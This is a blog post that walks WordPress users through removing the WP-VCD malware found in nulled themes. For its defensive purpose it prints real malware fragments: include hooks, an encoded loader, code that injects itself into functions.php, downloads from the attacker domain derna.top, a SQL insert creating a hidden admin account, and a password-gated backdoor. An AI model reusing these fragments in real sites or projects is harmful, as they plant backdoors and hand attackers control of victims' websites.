I discovered some of the shared freemium WordPress themes/plugins nulled websites has a WP-VCD Malware’s Onclick Ads, and I want to test it by my self how to rid this malware because its spreading now. I understand some of Bloggers has no budge to buy Paid themes in Themeforest and other paid WordPress themes.

And now i’ll share my knowledge how to clean/avoid malware’s from your free download paid themes/plugins from the freemium WordPress themes/plugins nulled websites. I’ve tried to download this great wordpress theme at VestaTheme.com  for testing only and i’m using Sublime Text to search the malware in this theme and now Let’s look inside it.

 

    • Check the function.php on the Theme Directory.
      if you found this kind of code:

      <?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

      you should remove delete it. because the class.theme-modules.php it contain the encrypted malware.
      see the code here class.theme-modules.php

       

    • One you Activate the Theme without removing the Malware, it will infect your WordPress Core files.First. the wp-includes folder the malware will add the files-The injected wp-vcd.php file starts with a long base64 encoded string named $install_code
      $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...]
      $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
      $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

      This file injects the code of this encoded string inside the theme’s functions.php, taking care of resetting the modification date and time

      if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
      if (strpos($content, 'WP_V_CD') === false){
      $content = $install_code . $content ;
      @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
      touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
      }
      else { $ping = false; }
      }

      see the code here: wp-vcd.php

      then it populates remotely a database/array of hostnames and passwords of the code injections via code.php and downloads the content of a remote txt file inside class.wp.php

      $content = @file_get_contents('http://www.derna.top/code.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
      @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.top/code.php'));

      class.wp.php tries to inject a user inside the wp db

      $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");

      and you should delete those files wp-vcd.php and class.wp.php, and remove the callback code from wp-includes/post.php on the first line

      <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>

      and check your functions.php from your theme because there is some malware’s codes on it

      see the code here: functions.php
      remove the

      <?php<?phpif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '17a6d0135359512f9fc543b4e9d97596')) {$div_code_name="wp_vcd"; switch ($_REQUEST['action']) {
      
      case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) {                                                                           if ($file = @file_get_contents(__FILE__))                                                                     {                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))                                                                                                             {
      $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);                                                                            @file_put_contents(__FILE__, $file);                            print "true";                                                                                                             }
      
      } } } break;
      case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) {                                                                           if ($file = @file_get_contents(__FILE__))                                                                     {                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))                                                                                                             {
      $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);                                                                            @file_put_contents(__FILE__, $file);                            print "true";                                                                                                             }
      [......]?>

      and remove until the end tag of malware.

Conclusion

Although that’s not a particularly dangerous malware, extra care is needed to avoid to become victim of this kind of attacks even with an updated WordPress install.

Keep a firewall with core files changes monitoring and always update themes.

You can use WordPress Security at WordFence.

I’ve been using WordFence Premium Security last month and its was great plugin to protect your website under malware’s. and you can get premium license for only $99/year
also you can try for free but limited features. but still it protects you from the intruders, malware’s and other threat. it can block country you like, and can scan live to monitor your process.

You can signup here for Premium here : WordFence Premium or
You can download here for Free: WordFence Free

Update

I noticed that this malware is capable to propagate in a shared hosting where multiple wordpress installations are present on the same root directory (cross site contamination).
It has been reported that the infection comes sometimes from nulled wordpress themes & plugins.

 

List of the Fremium Nulled Themes and Plugins and avoid downloading from theme if you don’t want to infect your blog with tons of malware’s.

  • GFXNulled.Net
  • VestaThemes.com
  • JojoThemes.com
  • WPLocker.com
  • NulledThemes.net
  • NulledForest.com
  • and much more.

 

Comments